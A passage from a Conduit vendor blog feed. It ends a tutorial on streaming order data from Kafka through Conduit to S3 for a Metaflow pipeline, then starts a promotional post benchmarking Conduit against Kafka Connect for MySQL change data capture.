        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; boto3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;s3&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        objs &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;list_objects_v2&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;Bucket&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3_bucket&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Prefix&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;orders/&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;files &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;o&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; o &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; objs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Contents&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;preprocess&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;preprocess&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; key &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            content &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_object&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;Bucket&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3_bucket&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Key&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Body&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;read&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;loads&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;content&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;extend&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; r &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;status&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;cancelled&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;train&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;train&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pandas &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; pd
        df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DataFrame&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;model &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;model-artifact&apos;&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;evaluate&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;evaluate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;accuracy&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.95&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;end&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;end&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Done&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; __name__ &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;__main__&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    OrdersFlow&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
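Note that the `preprocess` step assumes each object Conduit writes under `orders/` parses as a JSON array of records with a `status` field. A quick local sanity check of that assumption, using an invented sample payload:

```python
import json

# Invented sample payload mimicking what preprocess() expects to find in S3.
sample_object = json.dumps([
    {"order_id": 1, "status": "completed"},
    {"order_id": 2, "status": "cancelled"},
    {"order_id": 3, "status": "pending"},
])

records = json.loads(sample_object)
# Same filter the preprocess step applies: drop cancelled orders.
kept = [r for r in records if r.get("status") != "cancelled"]
print([r["order_id"] for r in kept])  # [1, 3]
```

Depending on the sink's format settings, objects may instead contain one JSON record per line; if so, adjust the parsing in `preprocess` accordingly.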
&lt;hr&gt;
&lt;h2&gt;Running Everything&lt;/h2&gt;
&lt;p&gt;Start Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Run your flow:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;python orders_flow.py run &lt;span class=&quot;token parameter variable&quot;&gt;--s3_bucket&lt;/span&gt; my-data-bucket&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Add &lt;code class=&quot;language-text&quot;&gt;--with batch&lt;/code&gt; if you’re scaling via AWS Batch.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Pro Tips&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Monitor Conduit at &lt;code class=&quot;language-text&quot;&gt;http://localhost:8080/metrics&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Use the &lt;a href=&quot;https://conduit.io/docs/using/other-features/dead-letter-queue&quot;&gt;built-in dead-letter queue&lt;/a&gt; for bad records&lt;/li&gt;
&lt;li&gt;Validate schemas upstream to catch issues early&lt;/li&gt;
&lt;li&gt;Git-track your pipeline YAMLs and Metaflow scripts&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/using/connectors/list&quot;&gt;Explore 100+ Conduit connectors beyond Kafka and S3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
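&lt;p&gt;Since the tips above suggest Git-tracking your pipeline YAMLs, here’s a minimal sketch of what one can look like. Plugin names and setting keys are illustrative; check the Conduit connector docs for the exact fields your version expects:&lt;/p&gt;

```yaml
# Minimal Conduit pipeline sketch: Kafka topic -> S3 bucket.
# Plugin names and setting keys are assumptions; verify them against
# the Conduit connector documentation for your version.
version: "2.2"
pipelines:
  - id: orders-to-s3
    status: running
    connectors:
      - id: kafka-source
        type: source
        plugin: builtin:kafka
        settings:
          servers: "localhost:9092"
          topics: "orders"
      - id: s3-destination
        type: destination
        plugin: builtin:s3
        settings:
          aws.bucket: "my-data-bucket"
          aws.region: "us-east-1"
```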
&lt;hr&gt;
&lt;p&gt;If you&apos;re building data pipelines with Metaflow, integrating Conduit is a no-brainer for real-time data ingestion. With hundreds of available connectors, it&apos;s the perfect companion—lightweight, blazing fast, and production-ready out of the box. Start using Conduit today and experience how seamlessly it transforms your streaming data workflows.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[MySQL CDC on a Budget: Conduit beats Kafka Connect]]></title><description><![CDATA[If you're building streaming pipelines and care about efficiency, scalability, and cost, Conduit isn't just an alternative to Kafka Connect, it's the better tool for the job.]]></description><link>https://meroxa.com/blog/mysql-cdc-on-a-budget-conduit-beats-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/mysql-cdc-on-a-budget-conduit-beats-kafka-connect</guid><dc:creator><![CDATA[Maha Mustafa]]></dc:creator><pubDate>Wed, 21 May 2025 14:30:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;When we started building Conduit, our goal was to create a viable replacement for Kafka Connect that is lighter, faster, and easier to use. Now, with a mature feature set and the upcoming 1.0 release, we’ve turned our focus to performance, producing benchmarks that compare Conduit with Kafka Connect.&lt;/p&gt;
&lt;p&gt;We started with &lt;a href=&quot;https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect/&quot;&gt;MongoDB and Kafka&lt;/a&gt;, then tested &lt;a href=&quot;https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect/&quot;&gt;Postgres to Kafka&lt;/a&gt;. In this blog post, we present MySQL to Kafka benchmarks pitting Conduit against Kafka Connect across various EC2 instances, highlighting how Conduit performs under real-world conditions, especially when &lt;strong&gt;efficiency, resource usage, cost&lt;/strong&gt;, and &lt;strong&gt;simplicity&lt;/strong&gt; matter most.&lt;/p&gt;
&lt;h1&gt;Benchmarks&lt;/h1&gt;
&lt;h2&gt;Metrics&lt;/h2&gt;
&lt;p&gt;Our benchmarks focus on three metrics: &lt;strong&gt;message throughput&lt;/strong&gt;, &lt;strong&gt;CPU utilization&lt;/strong&gt;, and &lt;strong&gt;memory usage&lt;/strong&gt;. Record throughput within Conduit is tracked using Conduit’s own metrics; the throughput of Kafka messages is measured via JMX in the Kafka broker; and resource usage is monitored with the stats that Docker exposes.&lt;/p&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;To ensure fairness and realism in our comparison, we conducted comprehensive benchmarks using &lt;a href=&quot;https://github.com/ConduitIO/benchi&quot;&gt;Benchi&lt;/a&gt; on two EC2 instance types, &lt;code class=&quot;language-text&quot;&gt;c7a.large&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;c7a.xlarge&lt;/code&gt;, each provisioned with a 40GB gp3 EBS volume.&lt;/p&gt;
&lt;p&gt;The pipelines’ configurations used for both Conduit and Kafka Connect are added to another repository called &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/tree/main&quot;&gt;streaming-benchmarks&lt;/a&gt;, which also contains the benchmark results.&lt;/p&gt;
&lt;p&gt;The amount of data we inserted into the MySQL instance for each test was &lt;strong&gt;3 million&lt;/strong&gt; records with the following schema:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; users &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	id &lt;span class=&quot;token keyword&quot;&gt;INT&lt;/span&gt; AUTO_INCREMENT &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	username &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	email &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UNIQUE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	first_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	last_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Benchmark Results&lt;/h2&gt;
&lt;h3&gt;Test #1:&lt;/h3&gt;
&lt;p&gt;Using the EC2 instance &lt;strong&gt;c7a.large, 40GB&lt;/strong&gt; (2 vCPU, 4 GiB RAM), the smallest instance in these benchmarks.&lt;/p&gt;
&lt;h3&gt;Results:&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Mode&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Tool&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Message throughput (msg/sec)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;CPU usage (%)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;RAM usage (MB)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Megabytes per second&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CDC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;63,414.1&lt;/td&gt;
&lt;td&gt;70&lt;/td&gt;
&lt;td&gt;682.7&lt;/td&gt;
&lt;td&gt;45.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;63,806.6&lt;/td&gt;
&lt;td&gt;69.5&lt;/td&gt;
&lt;td&gt;648.4&lt;/td&gt;
&lt;td&gt;45.3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
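&lt;p&gt;As a quick sanity check on the table above: the megabytes-per-second column is just message throughput multiplied by the average record size, which works out to roughly 713 bytes per record (our inference from the table, not a measured value):&lt;/p&gt;

```python
def mb_per_sec(msgs_per_sec: float, avg_record_bytes: float) -> float:
    """Data throughput in MB/s given message rate and average record size."""
    return msgs_per_sec * avg_record_bytes / 1_000_000

# CDC row: ~63,414 msg/sec at ~713 bytes/record gives ~45.2 MB/s
print(round(mb_per_sec(63_414.1, 713), 1))  # -> 45.2
```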
&lt;p&gt;This highlights Conduit&apos;s capability to perform efficiently despite limited resources. It successfully handled the MySQL to Kafka pipeline at a robust message rate while consuming little memory. Kafka Connect, on the other hand, &lt;em&gt;couldn’t even start due to &lt;strong&gt;insufficient resources&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;Test #2:&lt;/h3&gt;
&lt;p&gt;Using the EC2 instance &lt;strong&gt;c7a.xlarge, 40GB:&lt;/strong&gt; (4 vCPU, 8 GiB RAM)&lt;/p&gt;
&lt;h3&gt;Results:&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bebbb9028ba72304ce3b965737a99768/51800/mysql-ram-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAAB/0lEQVR42p1STWsTURTND1HqUpRgEfyAShdCimtB8Bd013alRFACXYTiR9GVK3+Aa0X/hGJNi1SNtpo2M/M6k/nIJDPvY+b47pvpJDGufHDJhHPvueeee2txHMO2bfi+D8/zwBiD67r431fLsgxJkpgYjUYYj8fgPIWQwFE/ArP6EI5ueNQD0408HVmeA7oOShW/04SkMAxD8yfXiXkJKP2dUo3+zjiHTBNIKU2YvDI3P60ro5amqVFWEeqOlKQcC8P2Q4St+1C/D4sueaHG4J4LedCFYvYsIY1IKitCGkM/8W0f9tXzsC6eAf/0ocCVrPDoWRt2fQFBc71QmZWEXI9D/lWv9ET+7ILdWoKzvAix93mClXi0fUq4MeuhEMIsYk7hj+9gjetwlurguzsFn1SQQhlfQ1J46RyCBxulj9lk5OmlKFUU8O48oWmWqYnCfxESAS1meinFyPOEpO4kkGAccB+34WhCv/kXIXk4HA6rc3nzkWPtNfDy1RcEK1dgX7sA3ikILU/i9naM5Sc53q9uIrp8Ft69tVkPzc1plVyYi8PztzHqjxKstnYQ3GnAWrmB8W7HJB+fpLj7IkTjKce79S34NxfhtZrGIkX3qaerkUxSSSEERxincCOJg8M+ot4vcOYg1XfK9fKSRGOhQLc3wNfOHmLCBwNTS7aRsD8BBW4IiQV/NAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RAM usage&quot;
        title=&quot;&quot;
        src=&quot;/static/bebbb9028ba72304ce3b965737a99768/5a190/mysql-ram-usage.png&quot;
        srcset=&quot;/static/bebbb9028ba72304ce3b965737a99768/772e8/mysql-ram-usage.png 200w,
/static/bebbb9028ba72304ce3b965737a99768/e17e5/mysql-ram-usage.png 400w,
/static/bebbb9028ba72304ce3b965737a99768/5a190/mysql-ram-usage.png 800w,
/static/bebbb9028ba72304ce3b965737a99768/51800/mysql-ram-usage.png 1196w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/f213e/mysql-message-throughput.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACLklEQVR42o1TS2sTURjNXxCXgvgCd0rUVNwK4kKlC6Gg1leRoEJbFFddKIpGQRREtC1iFrEbK77AjQt/gEVxI90kElsak3lk8phH79w7M8fvmxmapCr4wWGY+e493zl3zs10u13UajVomgZd12PU63VYlgXT0NFoNNBqt/FHRVEPfZUJggBCiBhKKfi+D+kL2J5CuWpi5WcV3lIV1vISNMNA0zQRhiHAkBKg/QOEruvGitZXSJNDFsBiaHNAw3g4g98j6se9WGy0hsxfrXARgVt6hs6tKfjfvqS9VBmV+PQR1qUzcGYeDdjOsE3P83pT0g0RHYF5chi/tm2EOz+XfKO1UWrRKU6jvnUDrPxoqjhRGlvmHxJGiQFPBFi2Qqw0POj509ByO+G+f5UQEplmSdQEoD8vQstuh3XlYu8I+i2HqeqFisLQDRfHChYWR06gmdsB521CGBLh2LSN3F1gbnIW9tAWmBP5nmUmZMuO49BhJwoXKhIHbroYvtdH+GY+Xh9IhbNPbOy5A5QmZuGkhAMKOS6cPRWE/0V47qmNvQXgxeQ/CNdb/kyW9113cbTQwuLxETR3b4bz+mWyRgUYfWxj120iHJ+Bk90E8/LYoGV+SgqopOmkAV9/+Dhy38Gphwa+n78A8/B+dD+8A+uXFPrxYhcHHyiUrs2ifSgLc+rqWkZZaUzIL3xDGKvCh7uqoJstGPUGFKVAUKy4JwiekDCaHVTKZXTo1si0x2Ce33/VWw0s34qoAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/5a190/mysql-message-throughput.png&quot;
        srcset=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/772e8/mysql-message-throughput.png 200w,
/static/0fec52f826f3fe9a35713d9787db94d3/e17e5/mysql-message-throughput.png 400w,
/static/0fec52f826f3fe9a35713d9787db94d3/5a190/mysql-message-throughput.png 800w,
/static/0fec52f826f3fe9a35713d9787db94d3/f213e/mysql-message-throughput.png 1192w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/187fa/mysql-cpu-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
